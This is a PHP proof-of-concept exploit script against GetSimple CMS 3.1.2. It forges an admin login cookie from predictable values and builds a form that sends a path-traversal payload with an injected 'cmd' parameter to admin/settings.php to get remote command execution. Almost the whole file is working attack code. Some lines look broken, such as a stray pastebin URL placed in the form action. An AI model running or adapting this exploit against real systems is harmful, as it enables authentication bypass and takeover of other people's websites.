<?php
// --------------------------------
// iHaiHa-vs-hosting2rce.php
// --------------------------------
// 26.12.2o12
//
// Specjal thanks to ihaiha team for
// 'point of view'.
//
// cookie() grepped from GetSimple 3.1.2, THANKS! ;]
// just for 'knowing the cookie'.
function create_cookie() {
global $USR,$SALT,$cookie_time,$cookie_name;
$saltUSR = $USR.$SALT;
$saltCOOKIE = sha1($cookie_name.$SALT);
setcookie($saltCOOKIE, sha1($saltUSR), time() + $cookie_time,'/');
setcookie('GS_ADMIN_USERNAME', $USR, time() + $cookie_time,'/');
}
// get-IT-simple-ihaiha-kod-yeah
function getsimple_cookie(){
// potrzebujemy:
$authenticated = true;
$USR = 'admin'; //$_POST['userid']; // admin?
$ver_no_clean = '3.1.2';
$SITEURL = '/your/GetSimple_3.1.2/admin/settings.php'; //$_POST['siteurl'];
$SALT = sha1($SITEURL);
$cookie_time = '7200';
$site_full_name = 'GetSimple';
$name_url_clean = strtolower(str_replace(' ','-',$site_full_name));
$cookie_name = strtolower($name_url_clean) .'_cookie_'. $ver_no_clean;
echo 'It should be interesting that we can (re)generate valid cookie<br>';
echo 'and login without password, right? <br><br><b>Generated cookie: ';
echo $cookie_name . '<br></b>';
echo '<br>Anyway: this simple code exploits vulnerability in :<br>';
echo '<b>admin/settings.php</b>:';
if( $authenticated ) {
# YES - set the login cookie, then redirect user to secure panel
// create_cookie();
setcookie('GS_ADMIN_USERNAME', $USR, time() + 3600,'/');
echo '<form method="post" action=http://pastebin.com/"'. $SITEURL .'">';
echo '<input type="hidden" name="username" value="' . $USR . '">';
echo '<input type="hidden" name="pwd" value="ihaihaiha">'; // sample; as a hardcoded (wrong anyway) pass
echo '<input type="hidden" name="lang" value="en_US/../../../../../../../../../../tmp/&cmd='.$_POST['cmd'].'">';
echo '<br>So add come cmd: <br>';
echo 'cmd: <input type="text" name="cmd">';
echo '<input type="submit" value="teraz">';
} else {
echo 'Nope. :C';
}
} // end of getsimple_cookie()
getsimple_cookie();